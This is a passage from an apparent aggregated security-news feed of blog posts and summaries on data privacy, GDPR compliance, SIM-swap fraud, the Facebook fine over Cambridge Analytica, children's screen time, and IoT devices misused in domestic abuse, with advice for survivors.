“Cybersecurity experts on the board have the proper expertise to advise the board about the best tools, processes and resources to keep hackers at bay,” the publication stated. “In addition, cybersecurity experts are the prime resource people for identifying new developments in IT as technology advances.”

This shift is promising for security professionals. With a digital perspective integrated directly into board decisions, IT departments should gain the leverage necessary to lobby for tools and support they need to meet the digital transformation with an adequate strategy to keep data secure.

Read the study from Ponemon Institute: Bridging the Digital Transformation Divide

The post Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do appeared first on Security Intelligence.

How to Navigate Business Ethics in a Data-Hungry Digital World

In this data-hungry world, high-profile breaches continue to make headlines. As global corporations and technology giants continue to collect enormous amounts of personal information, legislators and consumers are starting to ask pointed questions about business ethics.

Even when companies aren’t directly profiting from sharing their users’ personal information, they often fail to protect what they have. Consumers have begun to realize that what they read, who they engage with, what they buy — and even the pictures they share online — are all data monetized.

The critical question: Do the businesses who profit from the use of this personal data have integrity? If not, what needs to change to achieve ethical business practices?

How to Define Business Ethics in a Digital World

In general, ethics is a gray area. As different entities emerge — and the players evolve — ideas about right and wrong shift. Therefore, the goal for businesses must be to find a starting point, explained Jason Tan, CEO and co-founder of machine learning company Sift Science, to SecurityIntelligence.

“Each business needs to define for itself a clear North Star of what is right and what is wrong,” Tan said. “That doesn’t have to get into the nitty-gritty of what is right and wrong — but establish a baseline of what they want for a cultural mindset so that everyone is guided by the principle of doing the right thing as much as possible.”

Unfortunately, the “right thing” is often unclear. Since the General Data Protection Regulation (GDPR) went into effect, consumers’ inboxes have been flooded with emails updating them about privacy policy changes.

There’s a greater issue, however: Even when it comes to privacy policy and terms of service agreements, “users enter into legal agreements that are often difficult or impossible for the everyday person to understand,” Tan said.

While that’s not unethical, per se, it does err on the side of what is not right for the users.

“We think of business ethics as the set of values that a company uses to make decisions with an eye to all of its different stakeholder groups — employees, customers, value chain partners, investors, the communities in which it operates — and the impact the decision might have upon them,” said Erica Salmon Byrne, executive vice president at the Ethisphere Institute, to SecurityIntelligence.

Navigate Changes in Technology With a Moral Compass

Rapid changes in technology have impacted the speed with which businesses need to react, especially since the effects of their decisions have an increasingly global reach. Ethical companies know who they are and what matters to them. Therefore, in times of crisis, they can rely on this moral compass to direct their responses.

To be an ethical company, organizations must recognize risks in the actions of their employees and the behaviors of the company itself. Examples include how they work with personal data, other company information or trade secrets.

Businesses can mandate ethics with a moral compass that won’t compromise the personal information used to make business-critical decisions by clearly conveying what their expectations are and why they matter.

“Provide context to show how those expectations pertain to the area the employee is working in, provide trustworthy avenues to raise concerns and monitor and follow-up where possible,” Bryne said. “… but at the end of the day, your controls are only as good as your people.”

Find True North

Another step toward moral practice: Draft a more ethical version of your user agreements that are clear, transparent and accessible. This strategy will help your users understand the rights they are transferring — which is a whole branch of communication that hasn’t been developed.

“The norm for users is to never even look at the terms of service,” Tan said. “As a society, we want instant gratification quickly and effectively — so it is on the businesses to be thinking about how to make all this legalese more accessible to the everyday person to help them clearly understand what is happening.”

All of these ideas are lofty — but mean little unless they are put to action. While some technology giants continue to seek redemption for their reported misuse of personal data, many companies pride themselves on their business ethics. As governments continue to respond to heightened concerns about protecting privacy, there will likely be more regulations that attempt to legislate the ethical behavior of businesses.

Bryne warned that in the midst of trying to comply with regulations, it’s often easy to forget what those regulations are trying to achieve.

“If the company has clear values, ties their policies and procedures to those values, takes the time to engage employees on the values and expectations and offers avenues to ask questions that employees feel secure in using, it will go a very long way towards mitigating the risk of improperly using or protecting data and lots of other risks too,” Bryne said.

Download the 2018 Cost of a Data Breach Study from Ponemon Institute

The post How to Navigate Business Ethics in a Data-Hungry Digital World appeared first on Security Intelligence.

The SIM Hijackers

Lorenzo Franceschi-Bicchierai of Motherboard has a chilling story on how hackers flip seized Instagram handles and cryptocurrency in a shady, buzzing underground market for stolen accounts and usernames. Their victim's weakness? Phone numbers. He writes: First, criminals call a cell phone carrier's tech support number pretending to be their target. They explain to the company's employee that they "lost" their SIM card, requesting their phone number be transferred, or ported, to a new SIM card that the hackers themselves already own. With a bit of social engineering -- perhaps by providing the victim's Social Security Number or home address (which is often available from one of the many data breaches that have happened in the last few years) -- the criminals convince the employee that they really are who they claim to be, at which point the employee ports the phone number to the new SIM card. Game over.

Read more of this story at Slashdot.

World powers equip, train other countries for surveillance

Privacy International has released a report that looks at how powerful governments are financing, training and equipping countries with surveillance capabilities. Countries with powerful security agencies are spending literally billions to equip, finance, and train security and surveillance agencies around the world — including authoritarian regimes. This is resulting in entrenched authoritarianism, further facilitation of abuse against people, and diversion of resources from long-term development programmes. Global government surveillance Examples from the report include: In 2001, the US … More

The post World powers equip, train other countries for surveillance appeared first on Help Net Security.

Why Consumers Demand Greater Transparency Around Data Privacy

Although consumers have a wide range of attitudes toward data privacy, the vast majority are calling for organizations to be more transparent about how they handle customer information, according to a July 2018 survey from the Direct Marketing Association.

Previous research has shown that many companies are not doing enough to communicate and clarify their data-handling policies to customers. Given these findings, what practices can organizations adopt to be more upfront with users and build customer trust?

How Important Is Data Privacy to Consumers?

The Direct Marketing Association survey sorted respondents into three categories:

  1. Data pragmatists (51 percent): Those who are willing to share their data as long as there is a clear benefit.
  2. Data unconcerned (26 percent): Those who don’t care how or why their data is used.
  3. Data fundamentalists (23 percent): Those who refuse to share their personal data under any circumstances.

It’s not just fundamentalists who see room for improvement when it comes to organizations’ data-handling practices. Eighty-two percent of survey respondents said companies should develop a flexible privacy policy — while 84 percent said they should simplify their terms and conditions. Most tellingly, 86 percent said organizations should be more transparent with users about how they engage with customer data.

There Is No Digital Trust Without Transparency

The results of a May 2018 study from Ranking Digital Rights (RDR), Ranking Digital Rights 2018 Corporate Accountability Index, suggest that consumers’ demands for more transparency are justified. Not one of the 22 internet, mobile and telecommunications companies surveyed for the study earned a privacy score higher than 63 percent, indicating that most organizations fail to disclose enough information about data privacy to customers.

Transparency is often a critical factor for consumers when deciding whether to establish digital trust with a company or service provider. According to IBM CEO Ginni Rometty, organizations can and should work to improve their openness by being clear about what they’re doing with users’ data. Those efforts, she said, should originate from companies themselves and not from government legislation.

“This is better for companies to self-regulate,” Rometty told CNBC in March 2018. “Every company has to be very clear about their data principals — opt in, opt out. You have to be very clear and then very clear about how you steward security.”

The post Why Consumers Demand Greater Transparency Around Data Privacy appeared first on Security Intelligence.

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access

The Consumer Technology Association (CTA) is supporting the proposed ENCRYPT ACT which forbids the manufacturers of the technology to weaken

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access on Latest Hacking News.

Zero login: Fixing the flaws in authentication

Passwords, birth certificates, national insurance numbers and passports – as well as the various other means of authentication, that we have relied upon for the past century or more to prove who we are to others – can no longer be trusted in today’s digital age. That’s because the mishandling of these types of personally identifiable information (PII) documents from birth, along with a string of major digital data breaches that have taken place in … More

The post Zero login: Fixing the flaws in authentication appeared first on Help Net Security.

Four Healthcare IT Companies Warn PHO Put 800K Patients’ Data at Risk

Four healthcare IT companies warned that a primary health organization (PHO) put up to 800,000 patients’ medical data at risk. On 17 July, New Zealand and Australian healthcare companies HealthLink, Medtech Global, myPractice and Best Practice Software New Zealand sent a letter to New Zealand’s Privacy Commissioner. In it, they explained how they learned in […]… Read More

The post Four Healthcare IT Companies Warn PHO Put 800K Patients’ Data at Risk appeared first on The State of Security.

Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break

It’s mind-blowing to think that when you become a parent, you have just 18 summers with your child before he or she steps out of the mini-van and into adulthood. So at the mid-summer point, it’s a great time to ask: How balanced is your child’s screen time?

Don’t panic, it’s normal for screen time to spike over the summer months, which is why kids not only know how to balance their screen time but why it’s important.

Besides impacting family time and relationships, there are other potential risks that can result from excessive screen time such as obesity, depression, technology addiction, and anxiety. Too, there are risks such as privacy, cyberbullying, inappropriate content, and predators. So, while summer brings fun, it also requires parents to be even more diligent — and creative — when it comes to helping kids achieve some degree of balance with their tech.

A Small, Powerful Step

Kids are connected. Forever. There’s no going backward. Not all changes take a huge effort. Small changes matter.

Try this one small but powerful change. Turn your phone over whenever anyone in your family enters a room or begins talking to you. The simple act of turning our screens face down and looking at the person speaking strengthened our family dynamic. Try it — you might experience some of the same results we did. The kids may stick around and talk longer. Your spouse may feel more respected. And, most importantly, you won’t miss the priceless smiles, expressions, laughter, and body language that comes with eye contact and being fully present with the people who mean the most.

Another small step is agreeing to screen free zones (this includes TV) such as the dinner table, restaurants, and during family outings. Again, this one small step might open up a fresh, fun family dynamic.

If you feel your summer slip sliding away and need to seriously pull in the tech reigns, these five tips may help.

5 Ways to Help Curb Summer Tech

  1. Create summer ground rules. Include your kids in this process and come up with a challenge rather than a list of rules. Ground rules for summer might look different from the rest of the year, depending on your family’s schedule. Establishing a plan for chores, exercise, reading and waking up, puts expectations in place. To keep the tech in check, consider a tech exchange. For every hour of screen time, require your child to do something else productive. Keep it fun: Set up a reward system for completed chores.
  2. Get intentional with time. Carving out time to be together in our tech-driven world requires intentionality. Try sitting down together and making a summer bucket list for the remainder of the summer. Try your hand at fishing, canoeing, or hiking some new trails together. Board games, crafts, puzzles, a family project are also ways to make great memories.
  3. Keep up with monitoring.  Just because it’s summer doesn’t mean you can ease up on monitoring online activity goes by the wayside. Keep up with your child’s favorite apps and understand how he or she is using them. During summer especially, know the friends your kids connect with online. Review privacy and location settings. Note: Kids — especially teens — want their friends to know what they are doing and where they are at all times in hopes of finding something to do over the summer. This practice isn’t always a good idea since location-based apps can open your family up to risks.
  4. Consider a tech curfew. Establish a “devices off” rule starting an hour before lights out. This won’t be a favorite move, but then again, parenting well isn’t always fun. More and more studies show the physical toll excessive technology use can take on teens. Just because your child is in bed at night does not mean he or she is asleep. The ability to face time, text, watch movies, or YouTube videos can zap kids of valuable sleep.
  5. Maintain a balanced perspective. Kids and tech are intertwined today, which makes it nearly impossible to separate the two. Sure the risks exist, but there’s the upside of tech that brings values that echo throughout every generation: Friendship, connection, and affirmation. Checking social media and sharing one’s thoughts and life online is a regular part of growing up today. Keep this in mind as you work together to find the balance that works best for your family.

toni page birdsong


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break appeared first on McAfee Blogs.

Only 20% of companies have fully completed their GDPR implementations

Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation. EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end … More

The post Only 20% of companies have fully completed their GDPR implementations appeared first on Help Net Security.

U.S. Senators Ask FTC to Launch Privacy Investigation of Smart TVs

Two United States Senators asked the Federal Trade Commission (FTC) to investigate the privacy policies and practices of smart TV manufacturers. In mid-July, Senators Edward Markey (D-MA) and Richard Blumenthal (D-CT) submitted a letter to Joseph Simons, Chairman of the FTC, asking him to open an investigation. To support their argument for an FTC review, […]… Read More

The post U.S. Senators Ask FTC to Launch Privacy Investigation of Smart TVs appeared first on The State of Security.

Judge Jails Defendent For Failing To Unlock Phones

devoid42 writes: In a Tampa courtroom, Judge Gregory Holder held William Montanez in contempt of court for failure to unlock a mobile device. What led to this was a frightening slippery slope that threatens our Fourth Amendment rights to the core. Montanez was stopped for failing to yield properly. After being pulled over, the officer asked to search his car; Montanez refused, so the officer held him until a drug dog was brought in to give the officer enough probable cause to search the vehicle. They found a misdemeanor amount of marijuana, which they used to arrest Montenez, but they asked to search his two cellphones, which he also refused. They were able to secure a warrant for those as well, but Montenez claimed he had forgotten his password. The result: Montanez is being held in contempt of court and is serving a six-month jail sentence.

Read more of this story at Slashdot.

Think You’ve Got Nothing to Hide? Think Again — Why Data Privacy Affects Us All

We all hear about privacy, but do we really understand what this means? According to privacy law expert Robert B. Standler, privacy is “the expectation that confidential personal information disclosed in a private place will not be disclosed to third parties when that disclosure would cause either embarrassment or emotional distress to a person of reasonable sensitivities.”

It’s important to remember that privacy is about so much more than money and advertisements — it ties directly to who we are as individuals and citizens.

What Is the Price of Convenience?

Most users willingly volunteer personal information to online apps and services because they believe they have nothing to hide and nothing to lose.

When I hear this reasoning, it reminds me of stories from World War II in which soldiers sat on the sideline when the enemy was not actively pursuing them. When the enemy did come, nobody was left to protect the soldiers who waited around. That’s why it’s essential for all users to take a stand on data privacy — even if they’re not personally affected at this very moment.

Some folks are happy to disclose their personal information because it makes their lives easier. I recently spoke to a chief information security officer (CISO) and privacy officer at a major unified communications company who told me about an employee who willingly submitted personal data to a retail company because it streamlined the online shopping experience and delivered ads that were targeted to his or her interests.

This behavior is all too common today. Let’s dive deeper into some key reasons why privacy should be top of mind for all users — even those who think they have nothing to hide.

How Do Large Companies Use Personal Data?

There is an ongoing, concerted effort by the largest technology companies in the world to gather, consume, sell, distribute and use as much personal information about their customers as possible. Some organizations even market social media monitoring tools designed to help law enforcement and authoritarian regimes identify protesters and dissidents.

Many of these online services are free to users, and advertising is one of their primary sources of revenue. Advertisers want high returns per click, and the best way to ensure high conversion rates is to directly target ads to users based on their interests, habits and needs.

Many users knowingly or unknowingly provide critical personal information to these companies. In fact, something as simple as clicking “like” on a friend’s social media post may lead to new ads for dog food.

These services track, log and store all user activity and share the data with their advertising partners. Most users don’t understand what they really give up when technology firms consume and abuse their personal data.

Advanced Technologies Put Personal Data in the Wrong Hands

Many DNA and genomics-analysis services collect incredibly detailed personal information about customers who provide a saliva-generated DNA sample.

On the surface, it’s easy to see the benefit of submitting biological data to these companies — customers get detailed reports about their ancestry and information about potential health risks based on their genome. However, it’s important to remember that when users volunteer data about their DNA, they are also surrendering personal information about their relatives.

Biometrics, facial recognition and armed drones present additional data-privacy challenges. Governments around the world have begun using drones for policing and crowd control, and even the state of North Dakota passed a law in 2015 permitting law enforcement to arm drones with nonlethal weapons.

Facial recognition software can also be used for positive identification, which is why travelers must remove their sunglasses and hats when they go through immigration control. Law enforcement agencies recently started using drones with facial recognition software to identify “potential troublemakers” and track down known criminals.

In the U.S., we are innocent until proven guilty. That’s why the prospect of authorities using technology to identify potential criminals should concern us all — even those who don’t consider privacy to be an important issue in our daily lives.

Who Is Responsible for Data Privacy?

Research has shown that six in 10 boards consider cybersecurity risk to be an IT problem. While it’s true that technology can go a long way toward helping organizations protect their sensitive data, the real key to data privacy is ongoing and companywide education.

According to Javelin Strategy & Research, identity theft cost 16.7 million victims $16.8 billion in the U.S. last year. Sadly, this has not been enough to push people toward more secure behavior. Since global regulations and company policies often fall short of protecting data privacy, it’s more important than ever to understand how our personal information affects us as consumers, individuals and citizens.

How to Protect Personal Information

The data privacy prognosis is not all doom and gloom. We can all take steps to improve our personal security and send a strong message to governments that we need more effective regulations.

The first step is to lock down your social media accounts to limit the amount of personal information that is publicly available on these sites. Next, find your local representatives and senators online and sign up to receive email bulletins and alerts. While data security is a global issue, it’s important to keep tabs on local legislation to ensure that law enforcement and other public agencies aren’t misusing technology to violate citizens’ privacy.

Lastly, don’t live in a bubble: Even if you’re willing to surrender your data privacy to social media and retail marketers, it’s important to understand the role privacy plays in day-to-day life and society at large. Consider the implications to your friends and family. No one lives alone — we’re all part of communities, and we must act accordingly.

The post Think You’ve Got Nothing to Hide? Think Again — Why Data Privacy Affects Us All appeared first on Security Intelligence.

Want to avoid GDPR fines? Adjust your IT procurement methods

Gartner said many organizations are still not compliant with GDPR legislation even though it has been in force since May 2018. This is because they have not properly audited data handling within their supplier relationships. Sourcing and vendor management (SVM) leaders should, therefore, review all IT contracts to minimise potential financial and reputation risks. “SVM leaders are the first line of defense for organizations whose partners and suppliers process the data of EU residents on … More

The post Want to avoid GDPR fines? Adjust your IT procurement methods appeared first on Help Net Security.

Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first possible financial punishment that Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the gains of the giant of social networks, but it is a strong message to all the company that must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

According to the GDPR, the penalties allowed under the new privacy regulation are much greater, fines could reach up to 4% of the global turnover, that in case of Facebook are estimated at $1.9 billion.

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.” 

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

“In line with our approach, we have served Facebook with a Notice setting
out the detail of our areas of concern and invited their representations on
these and any action we propose. ” concludes the ICO update on the investigation published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,”

Pierluigi Paganini

(Security Affairs – Facebook, Cambridge Analytica)

The post Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal appeared first on Security Affairs.

Smashing Security #086: Elon Musk submarine scams and 2FA bypass

Smashing Security #086: Elon Musk submarine scams and 2FA bypass

Crypto scamming Thai cave scoundrels! $25 million to make anti-fake news videos! TimeHop data breach! Phone number port out scams!

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by B J Mendelson.

IoT domestic abuse: What can we do to stop it?

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed to manage it. The AI locked doors, windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There’s been endless works of fiction where smart technology micromanaging the home environment have gone rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present day problems momentarily, but first let’s take a look how we got here by casting our eye back about 15 years ago.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against this have been drawn up down the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to find yourself looking at a maximum of five years imprisonment, or a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly-embedded functionality, with numerous tales of them making life miserable for their loved ones, effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech,  and they proceed to mess with their lives remotely. One is a somewhat more straightforward to approach than the other, but neither are particularly great for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one example where websites slowly moving to HTTPs is beneficial, because an abuser can’t see the website data. Even so, they may still see the URLs and then you’re back to square one.

With IoT, everything is considerably much more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion solutions for people under threat. They can hardly jump in and start secretly tampering with the technology without notice—frankly people tend to become aware if a physical device isn’t acting how it should a lot faster than their covert piece of spyware designed to grab emails from a laptop.

All sorts of weird things can go wrong with some purchased spyware. Maybe there’s a server it needs to phone home to, but the server’s temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There’s so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly will say the same thing: be mindful of how obvious your record is. A book may work for some, text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a book than keep them away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools where you can detail information that isn’t saved on the device via programs designed to look like weather apps. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.

3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” them, which is keeping at least one compromised device running to make the abuser think all is well is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top results in search engines for help with these types of attack result in 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

The GDPR Evolution: A Letter to the CISO

The long-term impact of the General Data Protection Regulation (GDPR) is on the minds of key technology leaders around the world — from Singapore to Ireland to my current home of Austin, Texas to everywhere in between. You can see this manifest in major tech publications like SecurityIntelligence (and, perhaps, in the day-to-day interactions occurring within your organization).

For me, these sentiments were echoed during a several-week, multi-continent business trip I took to visit with clients and partners in Europe and Asia. Nearly every leader we sat down with asked us how they should be shepherding their teams through the enforcement of this transformative regulation and who should lead this effort between the security and privacy teams.

This state of confusion is not surprising, especially given the hype surrounding GDPR. A recent IBM Institute of Business Value (IBV) survey found that 44 percent of executives responsible for GDPR compliance worried the regulation would be replaced or modified sometime in the near future. This perception undoubtedly muddies the waters and influences their approach to compliance.

Even with enforcement live, it’s still somewhat unclear what GDPR compliance truly means for organizations worldwide; how it will impact people, process and technology; and (even more importantly) how it will affect relationships with customers.

But one thing is abundantly clear: GDPR is here to stay.

Who Is Responsible for GDPR Compliance?

Let’s take a step back for a moment to reflect on where we started. GDPR originated as a means to help infuse a higher standard of privacy into global business practices and give data subjects from the European Union (EU) more control over their personal information — a sovereignty that was challenged somewhat by the digital data explosion of the past decade. While the regulation only technically applies to EU data subjects, it signals a shift in how we think about privacy everywhere.

This redistribution of control in favor of consumers is a good thing. As security professionals, this supports our highest calling, which is to protect personal data in the face of cyber uncertainty. Ensuring data privacy is a core component of this mission — and the spirit of GDPR supports this goal. Some organizations recognize the importance of data privacy. In fact, 59 percent of respondents to the IBV study said they see GDPR as an occasion for transformation. Still, challenges remain.

Some of the pain originates from the fact that ownership of GDPR compliance initiatives shifted between 2016 (when the legislation was passed) and May 25, 2018 (when the regulation took effect). Originally, legal teams bore the core responsibility for validating the internal processes and controls that would drive the progression toward supporting GDPR requirements. This has morphed into a discussion led by chief information officers (CIOs) and chief information security officers (CISOs) about the implementation of technical controls, the creation of special teams, the appointment of chief data officers (CDOs) and the reshaping of organizational privacy processes to support the stringent requirements, such as a customer’s right to erasure.

Today, the responsibility is shared among technical teams, as well as CIOs and CISOs, who serve as the establishers, enablers and enforcers of a comprehensive GDPR program backed by robust technical controls. This accountability will likely remain for the foreseeable future — no pressure, though.

Collaboration is a key component of GDPR success, but the transition of responsibilities between teams is a challenge. I saw this in practice when visiting Singapore several weeks ago when leaders repeatedly asked where to begin so they could be ready to answer GDPR audit inquiries, which they expect to receive very soon.

Yes, the structures were in place from the legal side to support GDPR readiness, but now it’s game time. Despite years of effort to prepare for this moment, many technology leaders are still left scratching their heads, unsure of what comes next.

What Solutions Should CISOs Invest in to Get on Track?

According to the IBV study, the number one struggle among the surveyed group was performing data discovery and ensuring data accuracy, which is a principal task of GDPR preparation (and the first step for many). This issue illustrates the complex nature of operationalizing all the plans that have been made to get us to (and, hopefully, past) this point.

This point is where technology solutions and services can provide support. Unfortunately, although many vendors might want you to believe otherwise, there’s no silver bullet to establishing GDPR readiness or enforcing the new requirements across your organization. This behemoth of a compliance regulation requires a programmatic approach, but it can often be difficult to see the forest through the trees.

My suggestion: Remember that you don’t have to reinvent the wheel.

There are countless industry frameworks — including IBM’s own GDPR framework, a continuous loop outlining five key phases for readiness — that can serve as your guide. The fact that these guidelines are based on the experiences of others can provide some peace of mind.

It’s also a great idea to leverage a trusted partner or adviser to guide you throughout your readiness and enforcement processes. Rather than going it alone, lean on the organizations that already have deep expertise in the privacy space and can use that insight to help your company avoid missteps as you implement processes and select technologies.

Finally, when it comes to implementing requisite technology controls, I would advise you to think about the regulation and follow a risk-based approach to conducting business with consumers. Consider the data you’re being asked to protect and how it relates to your customers: What personal or sensitive information does your organization hold? Where does it live? Is it actually vulnerable to compromise? Have you taken the necessary steps to put privacy and security protections into place?

As a first step toward gaining this understanding, you should investigate solutions that help identify and remediate risk, such as Guardium Analyzer, which can help you find and classify GDPR-relevant data, irrespective of where it resides (whether on-premises or in the cloud); identify vulnerabilities associated with that data; and, ultimately, prioritize existing risks and take action to remediate them.

The Secret to GDPR Compliance Is Collaboration

